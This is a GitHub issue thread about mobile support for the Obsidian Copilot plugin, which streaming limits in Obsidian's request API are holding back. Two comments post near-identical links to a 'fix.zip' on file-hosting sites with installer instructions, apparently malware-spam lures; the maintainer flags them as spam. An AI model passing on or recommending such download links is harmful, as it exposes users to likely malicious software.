### ISSUE TITLE
[MASTER] Mobile Support

### ISSUE THREAD

**Issue by logancyang** [logancyang/obsidian-copilot#532]
Our awesome @gianluca-venturini is working on mobile support now. #513 

I created a build from his branch, tested and confirmed that Copilot Chat mode works for me on iPhone. If anyone wants to try, just unzip it and move the files to your iCloud (or whatever cloud storage) vault under `.obisidian/plugins/copilot/`.
[copilot-mobile.zip](https://github.com/user-attachments/files/16742411/copilot-mobile.zip)

The biggest blocker for this feature request is that Obsidian API's `requestUrl` is needed to avoid CORS issues, we will have to use it on mobile, but it does not support streaming. Copilot relies heavily on streaming, so we cannot move to `requestUrl` at the moment.

If you'd like Copilot mobile support sooner, please upvote this [feature request](https://forum.obsidian.md/t/support-streaming-the-request-and-requesturl-response-body/87381/2) on Obsidian's forum, and raise your voice in their discord server. Thank you!

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by logancyang** [comment]
Where are these spams from, please beware and do not download anything that you don't trust.
